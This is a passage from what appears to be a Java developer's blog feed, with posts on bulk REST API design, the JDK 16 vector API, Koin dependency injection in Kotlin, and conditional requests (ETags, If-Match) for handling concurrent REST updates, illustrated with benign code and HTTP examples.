{
"action": "replace",
"path": "/123",
"status": "success"
},
{
"action": "delete",
"path": "/124",
"status": "success"
}, {
"action": "create",
"status": "success"
}
]</pre>
<p>Here we need to use a generic response entry format again as it needs to be compatible with all possible request actions.</p>
<p>However, it would be too easy without a huge caveat: PATCH requires changes to be applied atomically.</p>
<p>The <a href="https://tools.ietf.org/html/rfc5789" target="_blank">RFC</a> says:</p>
<blockquote>
<p>The server MUST apply the entire set of changes atomically and never provide [..] a partially modified representation. If the entire patch document cannot be successfully applied, then the server MUST NOT apply any of the changes.</p>
</blockquote>
<p>I would usually not recommend implementing bulk operations atomically as this can increase complexity a lot.</p>
<p>A simple workaround to be compatible with the HTTP specifications is to create a separate sub-resource and use POST instead of PATCH.</p>
<p>For example:</p>
<pre>
POST /products/batch
</pre>
<p>(same request body as the previous PATCH request)</p>
<p>If you really want to go the atomic way, you might need to think about the response format again. In this case, it is not possible that some requested changes are applied while others are not. Instead you need to communicate which requested changes failed and which could have been applied if everything else had worked.</p>
<p>In this case, a response might look like this:</p>
<pre>
[
{
"action": "replace",
"path": "/123",
"status": "rolled back"
},
{
"action": "delete",
"path": "/124",
"status": "failed",
"error": "resource not found"
},
..
]</pre>
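<p>One way to get this all-or-nothing behaviour is to apply the changes to a copy and only swap it in if every change succeeded. The following plain Java sketch illustrates the idea with an in-memory map. <span class="code">AtomicPatch</span> and <span class="code">Change</span> are hypothetical names, only <em>replace</em> and <em>delete</em> are handled, and a real implementation would more likely rely on a database transaction.</p>

```java
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;

// Hypothetical in-memory sketch of an atomic bulk update.
final class AtomicPatch {

    static final class Change {
        final String action; // "replace" or "delete"
        final String id;
        final String value;

        Change(String action, String id, String value) {
            this.action = action;
            this.id = id;
            this.value = value;
        }
    }

    // Returns one status per change: "success", "rolled back" or "failed".
    static List<String> apply(Map<String, String> products, List<Change> changes) {
        Map<String, String> copy = new HashMap<>(products); // work on a copy
        List<Boolean> outcomes = new ArrayList<>();
        for (Change change : changes) {
            boolean exists = copy.containsKey(change.id);
            switch (change.action) {
                case "replace":
                    if (exists) {
                        copy.put(change.id, change.value);
                    }
                    outcomes.add(exists);
                    break;
                case "delete":
                    if (exists) {
                        copy.remove(change.id);
                    }
                    outcomes.add(exists);
                    break;
                default:
                    outcomes.add(false); // unknown action
            }
        }

        boolean allSucceeded = !outcomes.contains(false);
        if (allSucceeded) {
            // Commit: only now do the changes become visible.
            products.clear();
            products.putAll(copy);
        }

        List<String> statuses = new ArrayList<>();
        for (boolean succeeded : outcomes) {
            if (!succeeded) {
                statuses.add("failed");
            } else {
                statuses.add(allSucceeded ? "success" : "rolled back");
            }
        }
        return statuses;
    }
}
```

<p>If a single change fails, the original map stays untouched and all other changes are reported as <em>rolled back</em>.</p>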
<h2>Which HTTP status code is appropriate for responses to bulk requests?</h2>
<p>With bulk requests we have the problem that some parts of the request might execute successfully while others fail. If everything worked, it is easy: we can simply return HTTP 200 OK.</p>
<p>Even if all requested changes fail it can be argued that HTTP 200 is still a valid response code as long as the bulk operation itself completed successfully.</p>
<p>Either way, the client needs to process the response body to get detailed information about the processing status.</p>
<p>Another idea that might come to mind is HTTP 207 (Multi-Status). HTTP 207 is part of <a href="https://tools.ietf.org/html/rfc4918" target="_blank">RFC 4918</a> (HTTP extensions for WebDAV) and described like this:</p>
<blockquote>
<p>A Multi-Status response conveys information about multiple resources in situations where multiple status codes might be appropriate. [..] Although '207' is used as the overall response status code, the recipient needs to consult the contents of the multistatus response body for further information about the success or failure of the method execution. The response MAY be used in success, partial success and also in failure situations.</p>
</blockquote>
<p>So far this reads like a great fit.</p>
<p>Unfortunately HTTP 207 is part of the WebDAV specification and requires a specific response body format that looks like this:</p>
<pre class="brush: xml">
<?xml version="1.0" encoding="utf-8" ?>
<d:multistatus xmlns:d="DAV:">
<d:response>
<d:href>http://www.example.com/container/resource3</d:href>
<d:status>HTTP/1.1 423 Locked</d:status>
<d:error><d:lock-token-submitted/></d:error>
</d:response>
</d:multistatus></pre>
<p>This is likely not the response format you want. Some might argue that it is fine to reuse HTTP 207 with a custom response format. Personally I would not recommend doing this and instead use a simple HTTP 200 status code.</p>
<p>If the bulk request is processed asynchronously, HTTP 202 (Accepted) is the status code to use.</p>
<h2>Summary</h2>
<p>We looked at different approaches to building bulk APIs. All approaches have different up- and downsides. There is no single correct way as it always depends on your requirements.</p>
<p>If you need a generic way to submit multiple actions in a single request you can use a custom JSON format. Alternatively you can use a multipart content-type to merge multiple requests into a single request.</p>
<p>You can also come up with separate resources that express the desired operation. This is usually the simplest and most pragmatic way if you only have one or a few operations that need to support bulk operations.</p>
<p>In all scenarios you should evaluate if bulk operations really produce the desired performance gains. Otherwise, the additional complexity of bulk operations is usually not worth the effort.</p>
<p> </p>
<h3><em>Interested in more REST related articles? Have a look at my <a href="https://www.mscharhag.com/p/rest-api-design" target="_blank">REST API design page</a>.</em></h3>2021-05-03T19:51:23ZLooking into the JDK 16 vector APIMichael Scharhaghttps://www.mscharhag.comtag:mscharhag.com,2021-03-31:7e78b797-9f16-4e25-9388-aae50527a9f02021-04-06T16:09:09Z2021-04-08T12:26:57Z<p><a href="https://openjdk.java.net/projects/jdk/16/" rel="nofollow" target="_blank">JDK 16</a> comes with the incubator module <span class="code">jdk.incubator.vector</span> (<a href="https://openjdk.java.net/jeps/338" rel="nofollow" target="_blank">JEP 338</a>) which provides a portable API for expressing vector computations. In this post we will have a quick look at this new API.</p>
<p>Note that the API is in incubator status and likely to change in future releases.</p>
<h2>Why vector operations?</h2>
<p>When supported by the underlying hardware, vector operations can increase the number of computations performed in a single CPU cycle.</p>
<p>Assume we want to add two vectors each containing a sequence of four integer values. Vector hardware allows us to perform this operation (four integer additions in total) in a single CPU cycle. Ordinary additions would only perform one integer addition in the same time.</p>
<p>The new vector API allows us to define vector operations in a platform agnostic way. These operations then compile to vector hardware instructions at runtime.</p>
<p>Note that HotSpot already supports auto-vectorization which can transform scalar operations into vector hardware instructions. However, this approach is quite limited and utilizes only a small set of available vector hardware instructions.</p>
<p>A few example domains that might benefit from the new vector API are machine learning, linear algebra or cryptography.</p>
<h2>Enabling the vector incubator module (<span class="code">jdk.incubator.vector</span>)</h2>
<p>To use the new vector API we need to use JDK 16 (or newer). We also need to add the <span class="code">jdk.incubator.vector</span> module to our project. This can be done with a <span class="code">module-info.java</span> file:</p>
<pre class="brush: java">
module com.mscharhag.vectorapi {
requires jdk.incubator.vector;
}</pre>
<h2>Implementing a simple vector operation</h2>
<p>Let's start with a simple example:</p>
<pre class="brush: java">
float[] a = new float[] {1f, 2f, 3f, 4f};
float[] b = new float[] {5f, 8f, 10f, 12f};
FloatVector first = FloatVector.fromArray(FloatVector.SPECIES_128, a, 0);
FloatVector second = FloatVector.fromArray(FloatVector.SPECIES_128, b, 0);
FloatVector result = first
.add(second)
.pow(2)
.neg();</pre>
<p>We start with two float arrays (<span class="code">a</span> and <span class="code">b</span>) each containing four elements. These provide the input data for our vectors.</p>
<p>Next we create two <span class="code">FloatVector</span>s using the static <span class="code">fromArray(..)</span> factory method. The first parameter defines the size of the vector in bits (here 128). Using the last parameter we are able to define an offset value for the passed arrays (here we use 0).</p>
<p>In Java a <span class="code">float</span> value has a size of four bytes (= 32 bits). So, four float values match exactly the size of our vector (128 bits).</p>
<p>After that, we can define our vector operations. In this example we add both vectors together, then we square and negate the result.</p>
<p>The resulting vector contains the values:</p>
<pre>
[-36.0, -100.0, -169.0, -256.0]</pre>
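<p>For comparison, the same computation can be written as an ordinary scalar loop, which also makes it easy to check the values above by hand. This is a plain Java sketch that does not use the vector API. <span class="code">ScalarReference</span> is a hypothetical name and the square is computed as a simple multiplication instead of calling <span class="code">pow</span>.</p>

```java
// Hypothetical scalar counterpart of first.add(second).pow(2).neg().
final class ScalarReference {

    static float[] negatedSquareOfSum(float[] a, float[] b) {
        float[] result = new float[a.length];
        for (int i = 0; i < a.length; i++) {
            float sum = a[i] + b[i];  // add
            result[i] = -(sum * sum); // square, then negate
        }
        return result;
    }
}
```

<p>For the first element this gives -(1 + 5)² = -36, for the last one -(4 + 12)² = -256.</p>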
<p>We can write the resulting vector into an array using the <span class="code">intoArray(..)</span> method:</p>
<pre class="brush: java">
float[] resultArray = new float[4];
result.intoArray(resultArray, 0);</pre>
<p>In this example we use <span class="code">FloatVector</span> to define operations on float values. Of course we can use other numeric types too. Vector classes are available for <span class="code">byte</span>, <span class="code">short</span>, <span class="code">int</span>, <span class="code">long</span>, <span class="code">float</span> and <span class="code">double</span> (<span class="code">ByteVector</span>, <span class="code">ShortVector</span>, etc.).</p>
<h2>Working with loops</h2>
<p>While the previous example was simple to understand it does not show a typical use case of the new vector API. To gain any benefits from vector operations we usually need to process larger amounts of data.</p>
<p>In the following example we start with three arrays <span class="code">a</span>, <span class="code">b</span> and <span class="code">c</span>, each having 10000 elements. We want to add the values of <span class="code">a</span> and <span class="code">b</span> and store it in <span class="code">c</span>: <span class="code">c[i] = a[i] + b[i]</span>.</p>
<p>Our code looks like this:</p>
<pre class="brush: java">
final VectorSpecies<Float> SPECIES = FloatVector.SPECIES_128;
float[] a = randomFloatArray(10_000);
float[] b = randomFloatArray(10_000);
float[] c = new float[10_000];
for (int i = 0; i < a.length; i += SPECIES.length()) {
VectorMask<Float> mask = SPECIES.indexInRange(i, a.length);
FloatVector first = FloatVector.fromArray(SPECIES, a, i, mask);
FloatVector second = FloatVector.fromArray(SPECIES, b, i, mask);
first.add(second).intoArray(c, i, mask);
}</pre>
<p>Here we iterate over the input arrays in strides of vector length. A <span class="code">VectorMask</span> helps us if vectors cannot be completely filled from input data (e.g. during the last loop iteration).</p>
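<p>What the mask does becomes clearer when the loop is simulated with plain arrays. The following sketch does not use the vector API. <span class="code">MaskSketch</span> is a hypothetical class and its <span class="code">indexInRange</span> method only mimics, for non-negative offsets, the idea behind the method of the same name: lane <em>k</em> is active if <em>offset + k</em> is still inside the array.</p>

```java
// Plain Java simulation of masked, strided processing; no vector API involved.
final class MaskSketch {

    // Lane k is set if offset + k is a valid index below limit.
    static boolean[] indexInRange(int offset, int limit, int lanes) {
        boolean[] mask = new boolean[lanes];
        for (int k = 0; k < lanes; k++) {
            mask[k] = offset + k < limit;
        }
        return mask;
    }

    // Adds a and b in strides of 'lanes' elements, skipping inactive lanes.
    static float[] add(float[] a, float[] b, int lanes) {
        float[] c = new float[a.length];
        for (int i = 0; i < a.length; i += lanes) {
            boolean[] mask = indexInRange(i, a.length, lanes);
            for (int k = 0; k < lanes; k++) {
                if (mask[k]) {
                    c[i + k] = a[i + k] + b[i + k];
                }
            }
        }
        return c;
    }
}
```

<p>With 10000 elements and four lanes every stride is completely filled, so the mask only matters for array lengths that are not a multiple of the vector length. For six elements and four lanes, the second stride only has its first two lanes active.</p>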
<h2>Summary</h2>
<p>We can use the new vector API to define vector operations for optimizing computations for vector hardware. This way we can increase the number of computations performed in a single CPU cycle. Central elements of the vector API are type specific vector classes like <span class="code">FloatVector</span> or <span class="code">LongVector</span>.</p>
<p>You can find the example source code on <a href="https://github.com/mscharhag/blog-examples/blob/master/jdk16-vector-api/src/main/java/com/mscharhag/vectorapi/Main.java" target="_blank">GitHub</a>.</p>2021-04-08T12:26:57ZKotlin dependency injection with KoinMichael Scharhaghttps://www.mscharhag.comtag:mscharhag.com,2021-03-01:43fa632b-e18d-4413-a8f5-9eee98b7cc2d2021-03-08T07:29:19Z2021-03-08T07:29:22Z<p><a href="https://en.wikipedia.org/wiki/Dependency_injection" rel="nofollow" target="_blank">Dependency injection</a> is a common technique in today's software design. With dependency injection we pass dependencies to a component instead of creating them inside the component. This way we can separate construction and use of dependencies.</p>
<p>In this post we will look at <a href="https://github.com/InsertKoinIO/koin" rel="nofollow" target="_blank">Koin</a>, a lightweight Kotlin dependency injection library. Koin describes itself as <em>a DSL, a light container and a pragmatic API</em>.</p>
<h2>Getting started with Koin</h2>
<p>We start with adding the Koin dependency to our project:</p>
<pre class="brush: xml">
<dependency>
<groupId>org.koin</groupId>
<artifactId>koin-core</artifactId>
<version>2.2.2</version>
</dependency></pre>
<p>Koin artifacts are available on <em>jcenter.bintray.com</em>. If not already available you can add this repository with:</p>
<pre class="brush: xml">
<repositories>
<repository>
<id>central</id>
<name>bintray</name>
<url>https://jcenter.bintray.com</url>
</repository>
</repositories>
</pre>
<p>Or if you are using Gradle:</p>
<pre class="brush: xml">
repositories {
jcenter()
}
dependencies {
implementation "org.koin:koin-core:2.2.2"
}
</pre>
<p>Now let's create a simple <span class="code">UserService</span> class with a dependency to an <span class="code">AddressValidator</span> object:</p>
<pre class="brush: java">
class UserService(
private val addressValidator: AddressValidator
) {
fun createUser(username: String, address: Address) {
// use addressValidator to validate address before creating user
}
}</pre>
<p><span class="code">AddressValidator</span> simply looks like this:</p>
<pre class="brush: java">
class AddressValidator {
fun validate(address: Address): Boolean {
// validate address
}
}</pre>
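<p>Before involving a container, it helps to see what wiring these two classes by hand looks like. The following sketch uses Java instead of Kotlin and simplifies the classes: addresses are plain strings, the validation rule is made up, and <span class="code">ManualWiring</span> is a hypothetical holder class for the example.</p>

```java
// Hypothetical Java sketch of constructor injection without a container.
final class ManualWiring {

    static final class AddressValidator {
        // Made-up rule, only here to make the sketch executable.
        boolean validate(String address) {
            return address != null && !address.trim().isEmpty();
        }
    }

    static final class UserService {
        private final AddressValidator addressValidator;

        // The dependency is passed in; UserService never creates it itself.
        UserService(AddressValidator addressValidator) {
            this.addressValidator = addressValidator;
        }

        // Returns true if the address was valid and the user could be created.
        boolean createUser(String username, String address) {
            return addressValidator.validate(address);
        }
    }

    // Wiring by hand: build the dependency first, then hand it to its consumer.
    static UserService wire() {
        AddressValidator validator = new AddressValidator();
        return new UserService(validator);
    }
}
```

<p>A dependency injection container takes over the job of the <span class="code">wire()</span> method, which becomes more valuable as the number of components grows.</p>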
<p>Next we will use Koin to wire both components together. We do this by creating a Koin module:</p>
<pre class="brush: java">
val myModule = module {
single { AddressValidator() }
single(createdAtStart = true) { UserService(get()) }
}</pre>
<p>This creates a module with two singletons (defined by the <span class="code">single</span> function). <span class="code">single</span> accepts a lambda expression as parameter that is used to create the component. Here, we simply call the constructors of our previously defined classes.</p>
<p>With <span class="code">get()</span> we can resolve dependencies from a Koin module. In this example we use <span class="code">get()</span> to obtain the previously defined <span class="code">AddressValidator</span> instance and pass it to the <span class="code">UserService</span> constructor.</p>
<p>The <span class="code">createdAtStart</span> option tells Koin to create this instance (and its dependencies) when the Koin application is started.</p>
<p>We start a Koin application with:</p>
<pre class="brush: java">
val app = startKoin {
modules(myModule)
}</pre>
<p><span class="code">startKoin</span> launches the Koin container which loads and initializes dependencies. One or more Koin modules can be passed to the <span class="code">startKoin</span> function. A <span class="code">KoinApplication</span> object is returned.</p>
<h2>Retrieving objects from the Koin container</h2>
<p>Sometimes it is necessary to retrieve objects from the Koin dependency container. This can be done by using the <span class="code">KoinApplication</span> object returned by the <span class="code">startKoin</span> function:</p>
<pre class="brush: java">
// retrieve UserService instance from previously defined module
val userService = app.koin.get<UserService>()</pre>
<p>Another approach is to use the <span class="code">KoinComponent</span> interface. <span class="code">KoinComponent</span> provides an inject method we use to retrieve objects from the Koin container. For example:</p>
<pre class="brush: java">
class MyApp : KoinComponent {
private val userService by inject<UserService>()
...
}</pre>
<h2>Factories</h2>
<p>Sometimes object creation is not as simple as just calling a constructor. In this case, a factory method can come in handy. Koin's use of lambda expressions for object creation supports us here: we can simply call factory functions from the lambda expression.</p>
<p>For example, assume the creation of a <span class="code">UserService</span> instance is more complex. We can come up with something like this:</p>
<pre class="brush: java">
val myModule = module {
fun provideUserService(addressValidator: AddressValidator): UserService {
val userService = UserService(addressValidator)
// more code to configure userService
return userService
}
single { AddressValidator() }
single { provideUserService(get()) }
}</pre>
<p>As mentioned earlier, <span class="code">single</span> is used to create singletons. This means Koin creates only one object instance that is then shared by other objects.</p>
<p>However, sometimes we need a new object instance for every dependency. In this case, the <span class="code">factory</span> function helps us:</p>
<pre class="brush: java">
val myModule = module {
factory { AddressValidator() }
single { UserService(get()) }
single { OtherService(get()) } // OtherService constructor takes an AddressValidator instance
}</pre>
<p>With <span class="code">factory</span> Koin creates a new <span class="code">AddressValidator</span> object whenever an <span class="code">AddressValidator</span> is needed. Here, <span class="code">UserService</span> and <span class="code">OtherService</span> get two different <span class="code">AddressValidator</span> instances via <span class="code">get()</span>.</p>
<h2>Providing interface implementations</h2>
<p>Let's assume <span class="code">AddressValidator</span> is an interface that is implemented by <span class="code">AddressValidatorImpl</span>. We can still write our Koin module like this:</p>
<pre class="brush: java">
val myModule = module {
single { AddressValidatorImpl() }
single { UserService(get()) }
}</pre>
<p>This defines an <span class="code">AddressValidatorImpl</span> instance that can be injected into other components. However, it is likely that <span class="code">AddressValidatorImpl</span> should only expose the <span class="code">AddressValidator</span> interface. This way we can enforce that other components only depend on <span class="code">AddressValidator</span> and not on a specific interface implementation. We can accomplish this by adding a generic type to the <span class="code">single</span> function:</p>
<pre class="brush: java">
val myModule = module {
single<AddressValidator> { AddressValidatorImpl() }
single { UserService(get()) }
}</pre>
<p>This way we expose only the <span class="code">AddressValidator</span> interface while still creating an <span class="code">AddressValidatorImpl</span> instance.</p>
<h2>Properties and configuration</h2>
<p>Obtaining properties from a configuration file is a common task. Koin supports loading property files and gives us the option to inject properties.</p>
<p>First we need to tell Koin to load properties which is done by using the <span class="code">fileProperties</span> function. <span class="code">fileProperties</span> has an optional <span class="code">fileName</span> argument we can use to specify a path to a property file. If no argument is given Koin tries to load <em>koin.properties</em> from the classpath.</p>
<p>For example:</p>
<pre class="brush: java">
val app = startKoin {
// loads properties from koin.properties
fileProperties()
// loads properties from custom property file
fileProperties("/other.properties")
modules(myModule)
}</pre>
<p>Assume we have a component that requires some configuration property:</p>
<pre class="brush: java">
class ConfigurableComponent(val someProperty: String)</pre>
<p>.. and a <em>koin.properties</em> file with a single entry:</p>
<pre class="brush: xml">
foo.bar=baz</pre>
<p>We can now retrieve this property and inject it to <span class="code">ConfigurableComponent</span> by using the <span class="code">getProperty</span> function:</p>
<pre class="brush: java">
val myModule = module {
single { ConfigurableComponent(getProperty("foo.bar")) }
}</pre>
<h2>Summary</h2>
<p>Koin is an easy to use dependency injection container for Kotlin. Koin provides a simple DSL to define components and injection rules. We use this DSL to create Koin modules which are then used to initialize the dependency injection container. Koin is also able to inject properties loaded from files.</p>
<p>For more information you should visit the <a href="https://insert-koin.io/docs/reference/introduction/" rel="nofollow" target="_blank">Koin documentation</a> page. You can find the sources for this post on <a href="https://github.com/mscharhag/blog-examples/tree/master/kotlin-koin-example" target="_blank">GitHub</a>.</p>2021-03-08T07:29:22ZREST API Design: Dealing with concurrent updatesMichael Scharhaghttps://www.mscharhag.comtag:mscharhag.com,2021-02-14:3fc7cdab-ddfe-450f-b41c-b78391bf74fb2021-06-13T16:09:49Z2021-02-18T17:09:49Z<p>Concurrency control can be an important part of a REST API, especially if you expect concurrent update requests for the same resource. In this post we will look at different options to avoid lost updates over HTTP.</p>
<p>Let's start with an example request flow, to understand the problem:</p>
<p><a href="https://www.mscharhag.com/files/2021/rest-concurrent-updates.jpg" target="_blank"><img alt="" src="https://www.mscharhag.com/files/2021/rest-concurrent-updates.jpg" style="width: 100%; max-width: 700px" /></a></p>
<p>We start with Alice and Bob requesting the resource <em>/articles/123</em> from the server, which responds with the current resource state. Then, Bob executes an update request based on the previously received data. Shortly after that, Alice also executes an update request. Alice's request is also based on the previously received resource and does not include the changes made by Bob. Once the server has finished processing Alice's update, Bob's changes are lost.</p>
<p>HTTP provides a solution for this problem: <a href="https://tools.ietf.org/html/rfc7232" rel="nofollow" target="_blank">Conditional requests, defined in RFC 7232</a>.</p>
<p>Conditional requests use validators and preconditions defined in specific headers. Validators are metadata generated by the server that can be used to define preconditions. For example, last modification dates or ETags are validators that can be used for preconditions. Based on those preconditions the server can decide if an update request should be executed.</p>
<p>For state changing requests the <em>If-Unmodified-Since</em> and <em>If-Match</em> headers are particularly interesting. We will learn how to avoid concurrent updates using those headers in the next sections.</p>
<h2>Using a last modification date with an <em>If-Unmodified-Since</em> header</h2>
<p>Probably the easiest way to avoid lost updates is the use of a last modification date. Saving the date of last modification for a resource is often a good idea so it is likely we already have this value in our database. If this is not the case, it is often very easy to add.</p>
<p>When returning a response to the client we can now add the last modification date in the <em>Last-Modified</em> response header. The <em>Last-Modified</em> header uses the following format:</p>
<pre>
<day-name>, <day> <month-name> <year> <hour>:<minute>:<second> GMT</pre>
<p>For example:</p>
<p>Request:</p>
<pre>
GET /articles/123</pre>
<p>Response:</p>
<pre>
HTTP/1.1 200 OK
Last-Modified: Sat, 13 Feb 2021 12:34:56 GMT
{
"title": "Sunny summer",
"text": "bla bla ..."
}</pre>
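<p>A minimal sketch of how such a header value could be produced in Java. The class name <span class="code">HttpDates</span> and the method <span class="code">toLastModified</span> are hypothetical helpers introduced for illustration; only the JDK's <span class="code">java.time</span> API is used.</p>

```java
import java.time.Instant;
import java.time.ZoneOffset;
import java.time.format.DateTimeFormatter;
import java.util.Locale;

// Hypothetical helper, not part of any framework
class HttpDates {

    // Fixed-length HTTP date format, always expressed in GMT
    private static final DateTimeFormatter HTTP_DATE = DateTimeFormatter
            .ofPattern("EEE, dd MMM yyyy HH:mm:ss 'GMT'", Locale.ENGLISH)
            .withZone(ZoneOffset.UTC);

    // Formats a modification timestamp for the Last-Modified header
    static String toLastModified(Instant lastModified) {
        return HTTP_DATE.format(lastModified);
    }

    public static void main(String[] args) {
        Instant modified = Instant.parse("2021-02-13T12:34:56Z");
        // prints: Last-Modified: Sat, 13 Feb 2021 12:34:56 GMT
        System.out.println("Last-Modified: " + toLastModified(modified));
    }
}
```

<p>Using an explicit pattern with <span class="code">Locale.ENGLISH</span> keeps day and month names independent of the server's default locale.</p>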
<p>To update this resource the client now has to add the <em>If-Unmodified-Since</em> header to the request. The value of this header is set to the last modification date retrieved from the previous GET request.</p>
<p>Example update request:</p>
<pre>
PUT /articles/123
If-Unmodified-Since: Sat, 13 Feb 2021 12:34:56 GMT
{
"title": "Sunny winter",
"text": "bla bla ..."
}</pre>
<p>Before executing the update, the server has to compare the last modification date of the resource with the value from the <em>If-Unmodified-Since</em> header. The update is only executed if both values are identical.</p>
<p>One might argue that it is enough to check if the last modification date of the resource is newer than the value of the <em>If-Unmodified-Since</em> header. However, this gives clients the option to overrule other concurrent requests by sending a modified last modification date (e.g. a future date).</p>
<p>A problem with this approach is that the precision of the <em>Last-Modified</em> header is limited to seconds. If multiple concurrent update requests are executed in the same second, we can still run into the lost update problem.</p>
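<p>The server-side comparison described in this section can be sketched as follows. <span class="code">UnmodifiedSinceCheck</span> and <span class="code">mayUpdate</span> are hypothetical names. The sketch assumes the stored modification date may be more precise than one second and therefore truncates it before comparing. How to respond to a malformed header value is left to the caller.</p>

```java
import java.time.Instant;
import java.time.ZoneOffset;
import java.time.ZonedDateTime;
import java.time.format.DateTimeFormatter;
import java.time.temporal.ChronoUnit;
import java.util.Locale;

// Hypothetical helper illustrating the equality check for If-Unmodified-Since
class UnmodifiedSinceCheck {

    private static final DateTimeFormatter HTTP_DATE = DateTimeFormatter
            .ofPattern("EEE, dd MMM yyyy HH:mm:ss 'GMT'", Locale.ENGLISH)
            .withZone(ZoneOffset.UTC);

    // Returns true if the update may be executed.
    // Throws DateTimeParseException if the header value is not a valid date.
    static boolean mayUpdate(Instant storedLastModified, String ifUnmodifiedSince) {
        Instant fromHeader = ZonedDateTime.parse(ifUnmodifiedSince, HTTP_DATE).toInstant();
        // The header only carries second precision, so compare on that basis.
        // Equality (instead of "not newer") also rejects dates set in the future.
        return storedLastModified.truncatedTo(ChronoUnit.SECONDS).equals(fromHeader);
    }
}
```

<p>Because of the truncation, two updates within the same second still pass this check, which is exactly the limitation mentioned above.</p>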
<h2>Using an ETag with an <em>If-Match</em> header</h2>
<p>Another approach is the use of an entity tag (ETag). ETags are opaque strings generated by the server for the requested resource representation. For example, the hash of the resource representation can be used as ETag.</p>
<p>ETags are sent to the client using the <em>ETag</em> header. For example:</p>
<p>Request:</p>
<pre>
GET /articles/123</pre>
<p>Response:</p>
<pre>
HTTP/1.1 200 OK
ETag: "a915ecb02a9136f8cfc0c2c5b2129c4b"
{
"title": "Sunny summer",
"text": "bla bla ..."
}</pre>
<p>When updating the resource, the client sends the ETag in an <em>If-Match</em> header back to the server:</p>
<pre>
PUT /articles/123
If-Match: "a915ecb02a9136f8cfc0c2c5b2129c4b"
{
"title": "Sunny winter",
"text": "bla bla ..."
}</pre>
<p>The server now verifies that the <em>ETag </em>matches the current representation of the resource. If the ETag does not match, the resource state on the server has been changed between GET and PUT requests.</p>
<h2>Strong and weak validation</h2>
<p><a href="https://tools.ietf.org/html/rfc7232" target="_blank">RFC 7232</a> differentiates between weak and strong validation:</p>
<blockquote>
<p>Weak validators are easy to generate but are far less useful for comparisons. Strong validators are ideal for comparisons but can be very difficult (and occasionally impossible) to generate efficiently.</p>
</blockquote>
<p><em>Strong </em>validators change whenever a resource representation changes. In contrast <em>weak </em>validators do not change every time the resource representation changes.</p>
<p>ETags can be generated in weak and strong variants. Weak ETags must be prefixed by <em>W/</em>.</p>
<p>Here are a few example ETags:</p>
<p>Weak ETags:</p>
<pre>
ETag: W/"abcd"
ETag: W/"123"</pre>
<p>Strong ETags:</p>
<pre>
ETag: "a915ecb02a9136f8cfc0c2c5b2129c4b"
ETag: "ngl7Kfe73Mta"</pre>
<p>Note that the ETag must be placed within double quotes, so the shown quotes are not optional.</p>
<p>Besides concurrency control, preconditions are often used for caching and bandwidth reduction. In these situations weak validators can be good enough. For concurrency control in REST APIs strong validators are usually preferable.</p>
<p>Note that using <em>Last-Modified</em> and <em>If-Unmodified-Since</em> headers is considered weak because of the limited precision. We cannot be sure that the server state has not been changed by another request in the same second. Whether this is an actual problem depends on the number of concurrent update requests you expect.</p>
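<p>For <em>If-Match</em>, RFC 7232 requires a strong comparison: two ETags only match if neither is weak and both are identical. A rough sketch of such a check is shown below. <span class="code">IfMatchCheck</span> is a hypothetical helper. Splitting the header on commas is a simplification that assumes the opaque ETag values contain no commas themselves.</p>

```java
import java.util.Arrays;

// Hypothetical helper sketching the strong comparison used for If-Match
class IfMatchCheck {

    static boolean matches(String ifMatchHeader, String currentEtag) {
        String header = ifMatchHeader.trim();
        if (header.equals("*")) {
            return true; // "*" matches any current representation
        }
        if (currentEtag.startsWith("W/")) {
            return false; // a weak ETag never matches in a strong comparison
        }
        // The header may contain a comma-separated list of ETags
        return Arrays.stream(header.split(","))
                .map(String::trim)
                .filter(tag -> !tag.startsWith("W/"))
                .anyMatch(currentEtag::equals);
    }
}
```

<p>If this method returns <span class="code">false</span>, the update should not be executed.</p>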
<h2>Computing ETags</h2>
<p>Strong ETags have to be unique for all versions of all representations for a particular resource. For example, JSON and XML representations of the same resource should have different ETags.</p>
<p>Generating and validating strong ETags can be a bit tricky. For example, assume we generate an ETag by hashing a JSON representation of a resource before sending it to the client. To validate the ETag for an update request we now have to load the resource, convert it to JSON and then hash the JSON representation.</p>
<p>In the best case resources contain an implementation-specific field that tracks changes. This can be a precise last modification date or some form of internal revision number. For example, when using database frameworks like <em>Java Persistence API</em> (JPA) with optimistic locking we might already have a <em>version </em>field that increases with every change.</p>
<p>We can then compute an ETag by hashing the resource id, the media-type (e.g. <em>application/json</em>) together with the last modification date or the revision number.</p>
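<p>One possible way to implement this, shown as a sketch: <span class="code">EtagGenerator</span>, the <span class="code">|</span> separator and the choice of SHA-256 are assumptions made for this example, and any stable hash function would work just as well.</p>

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;

// Hypothetical helper: derives a strong ETag from id, media type and revision
class EtagGenerator {

    static String strongEtag(String resourceId, String mediaType, long version) {
        String input = resourceId + "|" + mediaType + "|" + version;
        try {
            MessageDigest digest = MessageDigest.getInstance("SHA-256");
            byte[] hash = digest.digest(input.getBytes(StandardCharsets.UTF_8));
            StringBuilder hex = new StringBuilder();
            for (byte b : hash) {
                hex.append(String.format("%02x", b));
            }
            // ETag values have to be wrapped in double quotes
            return "\"" + hex + "\"";
        } catch (NoSuchAlgorithmException e) {
            throw new IllegalStateException("SHA-256 is not available", e);
        }
    }
}
```

<p>With this approach the server can validate an ETag without rendering the full resource representation first. It only needs the id, the requested media type and the current revision number.</p>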
<h2>HTTP status codes and execution order</h2>
<p>When working with preconditions, two HTTP status codes are relevant:</p>
<ul>
<li>412 - <em>Precondition failed</em> indicates that one or more preconditions evaluated to false on the server (e.g. because the resource state has been changed on the server)</li>
<li>428 - <em>Precondition required</em> has been added in <a href="https://tools.ietf.org/html/rfc6585" target="_blank">RFC 6585</a> and indicates that the server requires the request to be conditional. The server should return this status code if an update request does not contain the expected preconditions</li>
</ul>
<p><a href="https://tools.ietf.org/html/rfc7232#section-5" target="_blank">RFC 7232</a> also defines the evaluation order for HTTP 412 (Precondition failed):</p>
<blockquote>
<p>[..] a recipient cache or origin server MUST evaluate received request preconditions after it has successfully performed its normal request checks and just before it would perform the action associated with the request method. A server MUST ignore all received preconditions if its response to the same request without those conditions would have been a status code other than a 2xx (Successful) or 412 (Precondition Failed). In other words, redirects and failures take precedence over the evaluation of preconditions in conditional requests.</p>
</blockquote>
<p>This usually results in the following processing order of an update request:</p>
<p><a href="https://www.mscharhag.com/files/2021/rest-concurrent-updates-processing-order.jpg" target="_blank"><img alt="" src="https://www.mscharhag.com/files/2021/rest-concurrent-updates-processing-order.jpg" style="width: 100%; max-width: 600px" /></a></p>
<p>Before evaluating preconditions, we check if the request fulfills all other requirements. When this is not the case, we respond with a standard <em>4xx</em> status code. This way we make sure that other errors are not suppressed by the 412 status code.</p>
